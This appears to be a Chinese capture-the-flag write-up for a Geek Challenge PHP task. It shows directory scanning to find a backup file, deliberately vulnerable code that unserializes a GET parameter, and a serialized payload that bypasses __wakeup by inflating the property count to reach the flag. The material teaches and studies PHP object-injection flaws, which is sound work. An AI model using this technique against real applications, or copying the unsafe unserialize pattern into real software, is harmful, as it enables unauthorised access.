[极客大挑战]PHP——目录泄露+反序列化
aaLiweipeng 2020-03-27
考点:目录泄露+PHP反序列化
题目一览
拿到题目,前端是个逗猫游戏
![[极客大挑战]PHP——目录泄露+反序列化](https://cdn.ancii.com/article/image/v1/cY/HH/yc/cyHYHcS4UC42ZKrqmT-6Jp6U2Nvjv60NhDUsPyE5QA94FrcmCiUqjYLKEYNnu8D23Gfx9DvJRsbw1011H_39Qg9hh3f8joB3K1wGi_nM1Ls.png "[极客大挑战]PHP——目录泄露+反序列化")
源码也没什么东西,先dirsearch跑一遍,这里设置下delay,防止频率过快被报429:
![[极客大挑战]PHP——目录泄露+反序列化](https://cdn.ancii.com/article/image/v1/YD/EG/_K/K_EDGYEcnr9MY2wl8eeKTiTczj0-_No32PBGvPxpFdUjwQInPg1Ur5ySsLY9Z3cBpHzplznEwyyWFquZKP6kJw.png "[极客大挑战]PHP——目录泄露+反序列化")
发现备份文件,打开发现源码:
![[极客大挑战]PHP——目录泄露+反序列化](https://cdn.ancii.com/article/image/v1/cY/HH/yc/cyHYHcS4UC42ZKrqmT-6Jp6U2Nvjv60NhDUsPyE5QA91QpaRYOrJ8i_8ydquqo_L8IlFqB0OCG9DEBye_w17i7tiC03LErsab3P4D_HuY6g.png "[极客大挑战]PHP——目录泄露+反序列化")
分析
index.php:
<?php
include ‘class.php‘;
$select = $_GET[‘select‘];
$res=unserialize(@$select);
?>class.php:
?php
include ‘flag.php‘;
error_reporting(0);
class Name{
private $username = ‘nonono‘;
private $password = ‘yesyes‘;
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
function __wakeup(){
$this->username = ‘guest‘;
}
function __destruct(){
if ($this->password != 100) {
echo "</br>NO!!!hacker!!!</br>";
echo "You name is: ";
echo $this->username;echo "</br>";
echo "You password is: ";
echo $this->password;echo "</br>";
die();
}
if ($this->username === ‘admin‘) {
global $flag;
echo $flag;
}else{
echo "</br>hello my friend~~</br>sorry i can‘t give you the flag!";
die();
}
}
}
?>flag.php里面是个假flag。
从index.php不难看出是个反序列化题目,我们直接分析class.php:
类名:name
成员变量:private的$username $password
__construct:类的构造函数
__wakeup:一个类反序列化时,调用该函数。会把username变成guest
__destruct:析构函数。类销毁的时候执行,只有username为admin,password为100时候,输出flag
绕过__wakeup方法很简单:序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行
<?php
class Name{
private $username = ‘admin‘;
private $password = 100;
public function __construct($username,$password){
$this->username = $username;
$this->password = $password;
}
}
$a = new Name();
echo serialize($a);
?>得到:
O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}在改对象个数之前,可以发现一个问题:Nameusername是12个字符,为什么显示14个?
见下例:
<?php
class test{
private $test1="hello";
public $test2="hello";
protected $test3="hello";
}
$test = new test();
echo serialize($test);
?>输出为:
O:4:"test":3:{s:11:"testtest1";s:5:"hello";s:5:"test2";s:5:"hello";s:8:"*test3";s:5:"hello";}如果我们抓包的话,可以看到如下结果:
{s:11:"%00test%00test1";s:5:"hello";s:5:"test2";s:5:"hello";s:8:"%00*%00test3";s:5:"hello";}private的成员变量被反序列化后变成 %00test%00test1
public的成员变量不变,仍为test2
protected的成员变量变成 %00*%00test3
这就是为什么我们的payload变成了14,因为多的2个字符为%00,为不可打印字符,所以不显示。
最终payload
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
最后别忘了传一个select参数:
![[极客大挑战]PHP——目录泄露+反序列化](https://cdn.ancii.com/article/image/v1/cY/HH/yc/cyHYHcS4UC42ZKrqmT-6Jp6U2Nvjv60NhDUsPyE5QA--pY9XkoP4ofMD3B4_nVM25WxVcVOoEVo3jd92wZXi2K8PGkmTSpMGq0yczIFIZRw.png "[极客大挑战]PHP——目录泄露+反序列化")
相关推荐
<?php. if (!empty($_POST)) {. $data1 = $_POST["data1"];$data2 = $_POST["data2"];$fuhao = $_POST["fuh